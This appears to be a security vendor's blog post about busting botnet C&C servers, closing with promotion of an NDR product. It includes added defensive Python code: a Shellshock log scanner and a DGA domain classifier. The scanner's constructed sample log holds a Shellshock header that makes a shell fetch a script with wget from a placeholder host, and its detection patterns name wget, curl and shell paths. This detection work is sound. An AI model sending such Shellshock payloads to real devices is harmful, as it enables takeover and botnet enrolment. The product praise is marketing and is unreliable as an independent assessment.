Hunting Advanced BotNets with NDR Solutions


Botnets are everywhere and play a crucial part in the kill chain in today's cyber security landscape. "EarthLink Spammer", the first publicly recorded botnet, dates back to 2000 and was built for spam by Khan K. Smith. This botnet aimed to deliver phishing spam emails in the hope of collecting credit card information. Smith was caught and sued for $25 million, when he had earned only $3 million.

A giant botnet that was publicly exposed was the Russian Bredolab botnet, with an estimated 30 million bots (victims). It sent malicious emails with malware attachments that would infect a computer when opened, effectively turning that machine into another zombie controlled by the botnet. At its peak, the botnet could send 3.6 billion infected emails daily. The other propagation method was drive-by downloads, which exploit software security vulnerabilities. This method allowed the botnet to bypass software protection and trigger downloads without the user being aware of them.


Malware attacks and the botnets behind this massive illegal industry drain our pockets and can even take our lives. These criminal organizations have rules and secrets they don't want revealed. They like to infect, hack and control victims without getting caught by law enforcement. Endpoint security is not enough to prevent zero-day malware attacks, so research has been focusing on their command and control centers. In 2013, I started to bust advanced botnets to see how they operate and what they steal from victims. This very quickly became my passion, with the hope that we can provide in-depth intelligence to the cyber security community. With this aim, I managed to bust over 20 unique C&C/botnet servers and reveal their dirty secrets.

Presentation outline

In this presentation, we reveal these famously neutralized botnets from the inside and the outside, with all the source code, files and logic behind those criminals. By showing these busted C&C servers, we will see and learn how seriously they take this illegal business, and we will have a chance to peek inside them.

  • Inside Cryptolocker C&C server

CryptoLocker was a ransomware trojan that targeted computers running Microsoft Windows and was first detected in September 2013. CryptoLocker propagated via infected email attachments and an existing botnet; when activated, the malware encrypted certain types of files stored on local and mounted network drives using RSA public-key cryptography, with the private key stored only on the malware's control servers.

  • Revealing Unique MitB Builder C&C Server

These injectors are the primary weapon used by cybercriminals against electronic banking applications where 2-factor authentication "tokens" are implemented. We know how easy it is to go underground and buy malware-as-a-service kits for trojans, ransomware, DDoS bots, etc. But what about a service for Man-in-the-Browser attacks against well-known electronic banking web applications, with the option to order a custom one?

  • NAS Botnet Revealed

The attackers send a GET request carrying a Shellshock exploit to IP ranges across the whole Internet. Successfully hacked NAS devices are forced to download a payload from the Internet. This payload contains a shell (sh) script with clever design logic built specifically for QNAP NAS devices. The payload downloads an ELF Linux installer package with bot functionality for DDoS. From this point, the attacker establishes persistence with an autorun script inside the compromised NAS device.
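As an added defensive illustration (this is not code from the original post or from Gatewatcher), the following Python script scans web-server access-log lines for the Shellshock marker that the NAS campaign above relies on, and raises the severity when the same header also carries a fetch-and-run hint such as a download tool or shell path. The log lines, the IP addresses (documentation ranges), the CGI path and the payload host are all constructed placeholders.

```python
import re

# Shellshock payloads arrive in an attacker-controlled HTTP header that starts with
# an empty bash function definition, "() {", followed by the commands bash will run.
# The marker below is the part every variant shares, so it is what we alert on.
SHELLSHOCK_MARKER = re.compile(r"\(\)\s*\{")

# Second-stage hint: the NAS campaign makes the device fetch and run a script, so a
# fetch tool or shell path next to the marker raises the finding's severity.
STAGE2_HINT = re.compile(r"\b(wget|curl|tftp|ftpget)\b|/bin/(ba)?sh\b")

# Apache/Nginx "combined" log format; quoted fields may contain \" escapes.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"'
)

# Constructed sample lines (not real traffic): documentation-range IPs, a placeholder
# payload host, and one line each of benign traffic, a download attempt, a bare probe
# and a benign client whose name happens to match a download tool.
SAMPLE_LOG = "\n".join([
    '203.0.113.5 - - [20/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.23 - - [20/Sep/2014:10:03:17 +0000] "GET /cgi-bin/example.cgi HTTP/1.1" 200 0 "-" "() { :; }; /bin/sh -c \'wget http://payload-host.invalid/nas.sh\'"',
    '192.0.2.77 - - [20/Sep/2014:10:05:44 +0000] "GET /cgi-bin/example.cgi HTTP/1.1" 200 0 "() { :; }; echo probe" "Mozilla/5.0"',
    '203.0.113.9 - - [20/Sep/2014:10:06:01 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "curl/7.35.0"',
])


def parse_line(line):
    """Return the combined-log fields as a dict, or None if the line does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_line(line):
    """Return a finding dict if any client-controlled field carries the Shellshock
    marker; severity is 'high' when a fetch/shell hint sits in the same field."""
    rec = parse_line(line)
    if rec is None:
        return None
    parts = rec["request"].split()
    path = parts[1] if len(parts) > 1 else rec["request"]
    for field in ("request", "referer", "ua"):
        value = rec[field]
        if SHELLSHOCK_MARKER.search(value):
            severity = "high" if STAGE2_HINT.search(value) else "medium"
            return {"src": rec["src"], "ts": rec["ts"], "path": path,
                    "field": field, "severity": severity, "evidence": value}
    return None


def scan_log(text):
    """Scan a whole log and return the list of findings in file order."""
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"[{finding['severity']}] {finding['src']} {finding['path']} "
              f"({finding['field']}): {finding['evidence']}")
```

The marker alone is enough to alert on: a legitimate client never sends a bash function definition in a header. The severity split separates Internet-wide scanners probing for the bug from requests that actually try to pull the stage-two script described above, which is the traffic worth correlating with outbound downloads from the NAS.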

  • KINS-origin malware acting like a real e-banking web app

We uncovered a C&C server used by hackers to control the infected victims. The malware analysis done on victims' machines revealed that malware from the KINS family targets specific Italian bank users thanks to ATSEngine, with the capability to dynamically inject code into the victim's browser and manage the "drops" in a completely automatic way.

  • Is 2-factor authentication enough to protect your money?

During recent analysis of malware targeting Italian financial institutions, we found a compelling sample that can bypass 2FA with a malicious app installed on the phone. Malware like this can drive users to download the fake application on their phone from the official Google Play Store using a Man-in-the-Browser (MitB) attack. Once on the user's PC, the attacker can control the machine and interact with it through a C&C server. What we describe in this article is a real, active botnet with at least 40 compromised zombie hosts.


Detecting and blocking botnet traffic is a massive challenge in the cyber security world because of the evolving techniques attackers implement to avoid detection. Botnets operate in one of two architectures: the client-server model and the peer-to-peer model.

Non-encrypted botnet traffic can be detected by network security solutions such as IDS and NGFW, but today's botnets are getting more sophisticated: they can use legitimate encrypted network services such as Twitter or Dropbox for their C&C, and they are also immune to SSL offloading (TLS interception) because the payload itself implements certificate pinning. This technique leaves traditional network security solutions blind unless they can process and detect encrypted data using AI and ML.

With AIONIQ, Gatewatcher can process and detect unknown, DGA-based C&C traffic within encrypted traffic using AI and supervised ML. AionIQ is a recent network detection and response platform that can confidently identify malicious actions and suspicious behavior by mapping all assets on the network. Combining this capability with unique performance in analyzing even encrypted network flows, AionIQ provides a 360-degree view of the level of cyber risk associated with each connection between assets and users, for an unparalleled level of detection and visibility.
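To make the DGA-detection idea in the two paragraphs above concrete, here is an added Python example (not Gatewatcher's code and not the AIONIQ model) that trains a small supervised logistic-regression classifier on lexical features of domain names and applies it to the names a network sensor can still observe when the C&C channel itself is encrypted, namely DNS queries and TLS SNI values. The benign and DGA-like training domains are constructed for the example, and the feature set, scaling and threshold are simplifications chosen for illustration rather than anything the platform uses.

```python
import math
from collections import Counter

VOWELS = set("aeiou")

# Constructed labelled set. Benign names are well-known services; the DGA-like names
# were made up to look like typical algorithmically generated labels (long, vowel-poor,
# high entropy). A real deployment would train on far more data than this.
BENIGN = ["google.com", "facebook.com", "wikipedia.org", "microsoft.com",
          "amazon.com", "github.com", "twitter.com", "dropbox.com",
          "youtube.com", "linkedin.com", "netflix.com", "cloudflare.com"]
DGA_LIKE = ["xk3jq9wzv7tr4m.net", "qpwzrtnhf4kx.com", "bvmz7hq2tklp.info",
            "wjkzqxvtbnpd.biz", "hgfdx8qlmzrt.org", "kjhzpvqwatrmnx.net",
            "zxqvbnmkjlpt.com", "tqwzrkpn3vxd.ru", "pkzvtrqwxbmn.info",
            "lmzqrtvkxwpn.org", "qzwxvtkrpnbm.net", "tzrkqwvxpnlm.com"]


def shannon_entropy(text):
    """Shannon entropy in bits of the character distribution of `text`."""
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in Counter(text).values())


def registrable_label(domain):
    """Second-level label of a hostname ("mail.google.com" -> "google").
    Simplification: no public-suffix handling, so "x.co.uk" yields "co"."""
    parts = domain.lower().strip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def features(domain):
    """Lexical feature vector; a leading 1.0 is the bias term, the rest are scaled
    into roughly [0, 1] so plain gradient descent behaves."""
    label = registrable_label(domain)
    n = len(label)
    if n == 0:
        return [1.0, 0.0, 0.0, 0.0, 0.0, 0.0]
    vowel_ratio = sum(ch in VOWELS for ch in label) / n
    digit_ratio = sum(ch.isdigit() for ch in label) / n
    run = longest = 0  # longest run of consonants, a classic DGA tell
    for ch in label:
        if ch.isalpha() and ch not in VOWELS:
            run += 1
            longest = max(longest, run)
        else:
            run = 0
    return [1.0, shannon_entropy(label) / 5.0, n / 30.0,
            vowel_ratio, digit_ratio, longest / 10.0]


def sigmoid(z):
    if z >= 0:
        return 1.0 / (1.0 + math.exp(-z))
    ez = math.exp(z)
    return ez / (1.0 + ez)


def train(samples, epochs=3000, lr=0.5):
    """Batch gradient descent for logistic regression.
    `samples` are (domain, label) pairs with label 1 = DGA-like, 0 = benign."""
    xs = [(features(d), y) for d, y in samples]
    w = [0.0] * len(xs[0][0])
    for _ in range(epochs):
        grad = [0.0] * len(w)
        for x, y in xs:
            err = sigmoid(sum(wi * xi for wi, xi in zip(w, x))) - y
            for i, xi in enumerate(x):
                grad[i] += err * xi
        w = [wi - lr * g / len(xs) for wi, g in zip(w, grad)]
    return w


def dga_probability(domain, w):
    return sigmoid(sum(wi * xi for wi, xi in zip(w, features(domain))))


def is_dga(domain, w, threshold=0.5):
    return dga_probability(domain, w) >= threshold


def training_accuracy(samples, w):
    return sum(is_dga(d, w) == bool(y) for d, y in samples) / len(samples)


TRAINING_SET = [(d, 0) for d in BENIGN] + [(d, 1) for d in DGA_LIKE]
MODEL = train(TRAINING_SET)


def flag_names(observed, w=None):
    """Apply the model to names seen on the wire (DNS query names, TLS SNI) and
    return the ones that look algorithmically generated."""
    w = MODEL if w is None else w
    return [d for d in observed if is_dga(d, w)]


if __name__ == "__main__":
    for d in ["google.com", "dropbox.com", "xqzvtrkpwnb.net"]:
        print(f"{d:20s} p(DGA) = {dga_probability(d, MODEL):.3f}")
```

The point of the example is where the features come from: even when the C&C payload is encrypted and pinned, the bot still has to resolve its rendezvous names and send a server name in the TLS handshake, and those cleartext names are what a lexical model scores. A lexical model alone will also flag legitimate CDN or tracking hostnames, so in practice the score is one signal to be combined with resolution failures (NXDOMAIN bursts) and the sandbox-to-domain linkage described below.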

Another unique capability of AIONIQ over competing NDR solutions is the integration of a sandbox module called AIONBYTES, which can help detect unknown malware samples that use legitimate domains/services such as Dropbox, Twitter, Slack and Tor for covert botnet traffic. This capability allows us to link the malware sample (by its SHA-256 hash) to the domain or IP that carries the botnet traffic.

LastInfoSec is the latest gem integrated into the Gatewatcher detection framework. This CTI platform pushes real-time cyber intelligence to help our customers be alerted to threats around the world.

Author: Senad ARUC
